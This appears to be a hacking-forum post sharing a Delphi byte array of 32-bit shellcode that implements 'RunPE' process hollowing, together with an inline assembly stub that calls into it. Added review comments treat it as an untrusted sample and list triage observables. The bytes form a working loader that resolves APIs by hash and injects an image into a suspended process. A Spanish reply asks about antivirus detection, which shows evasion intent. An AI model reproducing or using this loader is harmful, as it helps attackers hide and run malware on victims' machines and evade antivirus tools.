
Delphi Shellcode RunPE (Fully Dynamic)


H4ckCoder

Code:
// arrRunPE: 694 bytes (indices 0..693) of raw 32-bit x86 machine code kept as
// data. The thread title describes it as a "RunPE" loader; RunPE is the common
// name for process hollowing (MITRE ATT&CK T1055.012). No source or build
// provenance accompanies the bytes, so their behaviour has to be established
// by disassembly rather than taken from the post.
// NOTE(review): handle as an untrusted sample -- static disassembly or an
// isolated analysis sandbox only.
// Observables visible in the bytes, useful for triage and signature work:
//   - starts with $55,$8B,$EC (push ebp / mov ebp,esp) and ends with
//     $C9,$C3 (leave / ret);
//   - the ASCII string "ntdll" plus NUL ($6E,$74,$64,$6C,$6C,$00) is embedded
//     in the code stream right after an $E8,$06,$00,$00,$00 call;
//   - $64,$A1,$30,$00,$00,$00 (mov eax, fs:[30h], i.e. the PEB pointer)
//     occurs twice;
//   - the repeated "$BB <4 bytes> ... $E8 <rel32>" runs look like 32-bit
//     constants handed to one shared helper, which is consistent with
//     import-by-hash resolution -- confirm by disassembly.
>var
 arrRunPE:  array[0..693] of Byte = (
   $55,$8B,$EC,$81,$C4,$A4,$FA,$FF,$FF,$89,$45,$FC,$E8,$1B,$02,$00,$00,$89,$85,$CC,
   $FD,$FF,$FF,$BB,$F2,$0F,$56,$C6,$8B,$95,$CC,$FD,$FF,$FF,$E8,$19,$02,$00,$00,$89,
   $45,$F8,$BB,$A9,$8B,$80,$2D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$06,$02,$00,$00,$89,$45,
   $F4,$BB,$85,$3B,$AE,$DB,$8B,$95,$CC,$FD,$FF,$FF,$E8,$F3,$01,$00,$00,$89,$45,$F0,
   $BB,$93,$35,$DF,$85,$8B,$95,$CC,$FD,$FF,$FF,$E8,$E0,$01,$00,$00,$89,$45,$EC,$BB,
   $8D,$CB,$B6,$5D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$CD,$01,$00,$00,$89,$45,$E8,$BB,$53,
   $13,$C1,$78,$8B,$95,$CC,$FD,$FF,$FF,$E8,$BA,$01,$00,$00,$89,$45,$E4,$BB,$8A,$DB,
   $DF,$A5,$8B,$95,$CC,$FD,$FF,$FF,$E8,$A7,$01,$00,$00,$89,$45,$E0,$BB,$2E,$05,$50,
   $C8,$8B,$95,$CC,$FD,$FF,$FF,$E8,$94,$01,$00,$00,$89,$45,$DC,$BB,$85,$A1,$16,$A2,
   $8B,$95,$CC,$FD,$FF,$FF,$E8,$81,$01,$00,$00,$E8,$06,$00,$00,$00,$6E,$74,$64,$6C,
   $6C,$00,$5F,$57,$FF,$D0,$89,$85,$D0,$FD,$FF,$FF,$BB,$8B,$E3,$CD,$41,$8B,$D0,$E8,
   $60,$01,$00,$00,$89,$45,$D8,$BB,$39,$23,$0D,$2C,$8B,$95,$D0,$FD,$FF,$FF,$E8,$4D,
   $01,$00,$00,$89,$45,$D4,$68,$00,$02,$00,$00,$8D,$85,$D4,$FD,$FF,$FF,$50,$6A,$00,
   $FF,$55,$F8,$6A,$44,$8D,$85,$88,$FD,$FF,$FF,$50,$FF,$55,$D4,$FF,$55,$F4,$8B,$C8,
   $8D,$85,$78,$FD,$FF,$FF,$50,$8D,$85,$88,$FD,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,
   $6A,$00,$6A,$00,$6A,$00,$51,$8D,$85,$D4,$FD,$FF,$FF,$50,$FF,$55,$F0,$68,$CC,$02,
   $00,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$55,$D4,$C7,$85,$A4,$FA,$FF,$FF,$02,$00,
   $01,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$EC,$64,$A1,
   $30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$14,$8B,$40,$10,$50,$FF,$B5,$78,$FD,$FF,$FF,
   $FF,$55,$D8,$8B,$7D,$FC,$03,$7F,$3C,$6A,$40,$68,$00,$30,$00,$00,$FF,$77,$50,$FF,
   $77,$34,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E8,$89,$85,$74,$FD,$FF,$FF,$6A,$00,$FF,
   $77,$54,$FF,$75,$FC,$FF,$B5,$74,$FD,$FF,$FF,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E4,
   $8D,$47,$18,$89,$85,$70,$FD,$FF,$FF,$0F,$B7,$47,$14,$01,$85,$70,$FD,$FF,$FF,$33,
   $C0,$33,$F6,$33,$C9,$EB,$29,$6B,$C6,$28,$03,$85,$70,$FD,$FF,$FF,$8B,$9D,$74,$FD,
   $FF,$FF,$03,$58,$0C,$8B,$55,$FC,$03,$50,$14,$6A,$00,$FF,$70,$10,$52,$53,$FF,$B5,
   $78,$FD,$FF,$FF,$FF,$55,$E4,$46,$66,$3B,$77,$06,$72,$D1,$8B,$85,$74,$FD,$FF,$FF,
   $03,$47,$28,$89,$85,$54,$FB,$FF,$FF,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,
   $FF,$FF,$FF,$55,$E0,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$DC,$C9,$C3,$64,$A1,$30,$00,
   $00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$40,$18,$C3,$55,$8B,$EC,$83,
   $C4,$F4,$52,$89,$55,$FC,$8B,$4A,$3C,$03,$CA,$89,$4D,$F4,$8B,$49,$78,$03,$CA,$89,
   $4D,$F8,$8B,$51,$18,$8B,$49,$20,$03,$4D,$FC,$33,$FF,$8B,$31,$03,$75,$FC,$33,$C0,
   $51,$AC,$8B,$C8,$03,$F8,$D3,$C7,$85,$C0,$75,$F5,$59,$3B,$FB,$74,$10,$83,$C1,$04,
   $4A,$75,$E0,$BA,$C2,$58,$62,$1B,$5A,$33,$C0,$C9,$C3,$8B,$45,$FC,$8B,$4D,$F8,$8B,
   $59,$18,$8B,$49,$24,$03,$C8,$2B,$DA,$D1,$E3,$03,$CB,$0F,$B7,$19,$8B,$4D,$F8,$8B,
   $49,$1C,$03,$C8,$C1,$E3,$02,$03,$CB,$03,$01,$5A,$C9,$C3);

// Example of use, as posted. dwArrayToRun is not declared anywhere in this
// snippet; the code only shows it being loaded into EAX before control passes
// to the byte array.
// NOTE(review): an indirect CALL into a buffer that is declared as data is the
// pattern to look for when triaging Delphi binaries that embed this blob.

asm
 MOV EAX, dwArrayToRun  // value handed to the blob in EAX (not defined here)
 LEA EBX, arrRunPE[0]   // EBX := address of the first byte of arrRunPE
 CALL EBX               // transfers control to the byte array as code
end;


Coder/credits : DeadlyVermilion
 
Re: Shellcode RunPE (Fully Dynamic)

Esta RunPE ya la había usado. ¿Sólo es detectada por Ikarus? Buen trabajo.

Ese icode es toda una máquina.

 